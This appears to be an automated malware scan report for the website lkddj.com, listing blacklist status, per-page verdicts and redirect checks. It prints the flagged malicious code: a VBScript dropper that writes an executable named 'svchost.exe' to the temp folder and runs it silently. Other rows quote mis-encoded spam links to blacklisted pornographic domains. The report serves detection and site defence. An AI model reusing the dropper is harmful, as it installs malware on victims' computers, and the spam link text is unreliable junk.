Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lkddj.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lkddj.com/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:08 GMT Accept-Ranges: bytes ETag: "f46749a6a023d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 190489 Content-Location: http://lkddj.com/index.html Content-Type: text/html Last-Modified: Mon, 29 Dec 2014 19:50:08 GMT X-Died: timeout at scan.pm line 1566. | clean |
http://lkddj.com/index.html | 200 OK Content-Length: 190489 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://lkddj.com/js/flash.js | 200 OK Content-Length: 7280 Content-Type: application/x-javascript | clean |
http://lkddj.com/js/nav.js | 200 OK Content-Length: 7280 Content-Type: application/x-javascript | clean |
http://lkddj.com/js/zhongtie.js | 200 OK Content-Length: 7280 Content-Type: application/x-javascript | clean |
http://s15.cnzz.com/stat.php?id=4167029&web_id=4167029&show=pic | 200 OK Content-Length: 10075 Content-Type: application/javascript | clean |
http://lkddj.com/js/tranbig5.js | 200 OK Content-Length: 7280 Content-Type: application/x-javascript | clean |
http://lkddj.com/about/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:22 GMT Accept-Ranges: bytes ETag: "4448808a4f29d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135183 Content-Location: http://lkddj.com/about/index.html Content-Type: text/html Last-Modified: Tue, 06 Jan 2015 01:24:39 GMT | clean |
http://lkddj.com/about/index.html | 200 OK Content-Length: 135183 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hbjlpj.com ...[1977 bytes skipped]... gt;91³ÉÈËÍø</a></li> <li><a href="http://xfweiyu.com/news/">»¶»¶ÓéÀÖÌì¿Õ</a></li> <li><a href="http://chinarhy.com/content/">ÄÐÅ®¹ýÐÔÉú»îµÄ×ËÊƺÍÉùÒô</a></li> <li><a href="http://bc2068.com/about/">°®ÇéÃÜÂëÈ«¼¯</a></li> <li><a href="http://kmtddz.com/news/">СÔó°®ÀöË¿ ºÏ¼¯</a></li> <li><a href="http://hbjlpj.com/news_cn/">¼ªÄá˹×ö°®¼Ç¼ÊÓƵ</a></li> <li><a href="http://cnjcmx.com/chanpin/">ÐÔ¸ÐÃØÊéqvod</a></li> <li><a href="http://jssywz.com/trades/">Çå´¿ qvod</a></li> <li><a href="http://jggrp.com/news/">´ó <dd><span id="date">2013Äê1ÔÂ5ÈÕ</span> <a href="989.html">se.913kxw.com-ÇéÉ«ÎÞÒ¹Ìì-ÈËÌåÒÕÊõÓï-ÎÞ¶¾É«Íø</a></dd> <dd><span id="date">2013Äê1 ...[2497 bytes skipped]... | ||
http://baidu.nvdei.com/js/a.js | 200 OK Content-Length: 745 Content-Type: application/x-javascript | clean |
http://lkddj.com/html/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:27 GMT Accept-Ranges: bytes ETag: "a4c17d6fd429d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135429 Content-Location: http://lkddj.com/html/index.html Content-Type: text/html Last-Modified: Tue, 06 Jan 2015 17:15:57 GMT | clean |
http://lkddj.com/html/index.html | 200 OK Content-Length: 135429 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hbyfzl.com ...[1067 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://hbyfzl.com/mtope/">oumeixingjiaoshipin</a></li> <li><a href="http://hasgz.com/news/">ÈÕ±¾»ÆÉ«ÑÝÔ±</a></li> <li><a href="http://jldzs.cn/mtope/">²ÜÂÛÕ½</a></li> <li><a href="http://hrbwolf.com/content/">ÖйúÖÐÄêÅÖ¸¾ÈËÌåÒÕÊõ</a></li> <li><a href="http://d-vv.com/items/">Ó׳ÝÂèßä</a></li> <li><a href="http://bjrhjx.com/about/">ÁµÓûÖ®</a></li&g ...[3419 bytes skipped]... | ||
http://lkddj.com/chanpin/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:29 GMT Accept-Ranges: bytes ETag: "b87e6428592ad01:1657" Server: Microsoft-IIS/6.0 Content-Length: 136236 Content-Location: http://lkddj.com/chanpin/index.html Content-Type: text/html Last-Modified: Wed, 07 Jan 2015 09:06:01 GMT | clean |
http://lkddj.com/chanpin/index.html | 200 OK Content-Length: 136236 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: kuaiyite.com ...[1522 bytes skipped]... ">ÉÙÅ®ÐÔ¸ÐÈÈÎèÊÓƵֱ²¥</a></li> <li><a href="http://xsydesign.com/news/">ÓÅÒ¿â°Ù¶È°Ù¿Æ</a></li> <li><a href="http://un114.cn/news/">ËÄ·½É«²¥ÔÚÏßµçÓ°</a></li> <li><a href="http://bjdfjt.com/content/">É«Òù</a></li> <li><a href="http://pgycyl.com/contact/">ƼˮÏà·êС˵Íø</a></li> <li><a href="http://kuaiyite.com/news/">ɧbiyinshuisijian</a></li> <li><a href="http://maishayuo.com/news/">ºÍͬѧ½»»»ÂèÂè</a></li> <li><a href="http://gyjck.com/items/">¿ÆÊ¿ÍþÏãÌåÈé</a></li> <li><a href="http://hrbwolf.com/mtope/">ºÍÉô×ÓÔÚÓñÃ×µØÀï</a></li> <li><a href="http://d-vv.com/html/">ÃÀŮͼƬÃâ·ÑÏÂÔØ</a></li> <li><a href="http://jajzbj.com/guest/">ÂéÉúÔçÃç¿ì²¥² ...[2961 bytes skipped]... | ||
http://lkddj.com/news_cn/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:33 GMT Accept-Ranges: bytes ETag: "30d8bfcde2ad01:1657" Server: Microsoft-IIS/6.0 Content-Length: 134820 Content-Location: http://lkddj.com/news_cn/index.html Content-Type: text/html Last-Modified: Thu, 08 Jan 2015 00:57:17 GMT | clean |
http://lkddj.com/news_cn/index.html | 200 OK Content-Length: 134820 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dlmfsy.com ...[1060 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://dlmfsy.com/chanpin/">¹Å´¨ÒÁÖ¯°Ù¶ÈÔÆÖÖ×Ó</a></li> <li><a href="http://dyhmjd.com/content/">¾ÍÈ¥¸ÉÃÃÃÃ</a></li> <li><a href="http://xahkjc.com/chanpin/">91pornvipÕ˺ŷÖÏí</a></li> <li><a href="http://otsdt.com/news/">ºÃ¿´µÄ¼¤ÇéƬ</a></li> <li><a href="http://tkgouw.com/news_cn/">ĸ×ÓÐÔÐÐΪ</a></li> <li><a href="http://comeonstar.com/news/">¸ßÇå ¿ìËÙ Î ...[3423 bytes skipped]... | ||
http://lkddj.com/contact/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:36 GMT Accept-Ranges: bytes ETag: "26b065eb622bd01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135459 Content-Location: http://lkddj.com/contact/index.html Content-Type: text/html Last-Modified: Thu, 08 Jan 2015 16:48:24 GMT | clean |
http://lkddj.com/contact/index.html | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://lkddj.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://lkddj.com/guest/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:47 GMT Accept-Ranges: bytes ETag: "5ac674dfe72bd01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135324 Content-Location: http://lkddj.com/guest/index.html Content-Type: text/html Last-Modified: Fri, 09 Jan 2015 08:40:08 GMT | clean |
http://lkddj.com/guest/index.html | 200 OK Content-Length: 135324 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dlmfsy.com ...[1339 bytes skipped]... <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://zgwjdl.com/content/">www.sex8.com</a></li> <li><a href="http://guozhenchuju.com/contact/">Å·ÃÀµçÓ°¹·ÅäÈË</a></li> <li><a href="http://unzlht.com/customer/">°×DÎè¿ì²¥ÖÖ×Ó</a></li> <li><a href="http://dlmfsy.com/news/">ÑîÃÝ´óÐØÕÕ</a></li> <li><a href="http://gylgy.com/project/">Â×ÀíƬ qvod</a></li> <li><a href="http://xjbolg.com/items/">ÊÞ½»Å®</a></li> <li><a href="http://ssshzk.com/items/">³ô×÷¶¯»Æ¬</a></li> <li><a href="http://hnbakery.com/companys/">½ãåê±Æ</a></li> <li><a href="http://hffymz.com/news/">ËÀÍö·É³µ3¸ßÇå</a></li> ...[3156 bytes skipped]... | ||
http://lkddj.com/guest/0.html | 200 OK Content-Length: 16626 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hnlssn.com ...[1500 bytes skipped]... ;/h2> <ul><li><a href="http://chinashenghuai.cn/news/">¶àÀ²aÃξ²Ïã½ûͼ</a></li> <li><a href="http://aeddq.com/content/">·çɧŮÀÏʦµÄÓÕ»ó</a></li> <li><a href="http://hljql.cn/gbuks/">´ó²Ïì×÷Æ··¬ºÅ</a></li> <li><a href="http://hdyxmedia.com/news/">Ö麣ÕÒµ¥ÉíÅ®ÈËqqȺ</a></li> <li><a href="http://hnlssn.com/news/">ÖÐÒ°arisa×ÊÁÏ</a></li> <li><a href="http://tulouo.com/service/">wwwºÝºÝߣ..com</a></li> <li><a href="http://bjkqk.com/items/">ÔçÒÒٶÒÀ86²¿ÖÖ×Óbt</a></li> <li><a href="http://jlwig.com/news/">ÎåÔÂÌìÅÚ±ù»ð¾ÅÖØÌì</a></li> <li><a href="http://beijing-ascc.com/items/">wohesaozi</a></li> <li><a href="http://yongji100.com/items/">ÍøÂçºì ...[2824 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lkddj.com
Result:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 23:24:08 GMT
Accept-Ranges: bytes
ETag: "f46749a6a023d01:1657"
Server: Microsoft-IIS/6.0
Content-Length: 190489
Content-Location: http://lkddj.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 19:50:08 GMT
X-Died: timeout at scan.pm line 1566.
...190489 bytes of data.
GET / HTTP/1.1
Host: lkddj.com
Result:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 23:24:08 GMT
Accept-Ranges: bytes
ETag: "f46749a6a023d01:1657"
Server: Microsoft-IIS/6.0
Content-Length: 190489
Content-Location: http://lkddj.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 19:50:08 GMT
X-Died: timeout at scan.pm line 1566.
...190489 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lkddj.com
Referer: http://www.google.com/search?q=lkddj.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lkddj.com
Referer: http://www.google.com/search?q=lkddj.com
Result:
The result is similar to the first query. There are no suspicious redirects found.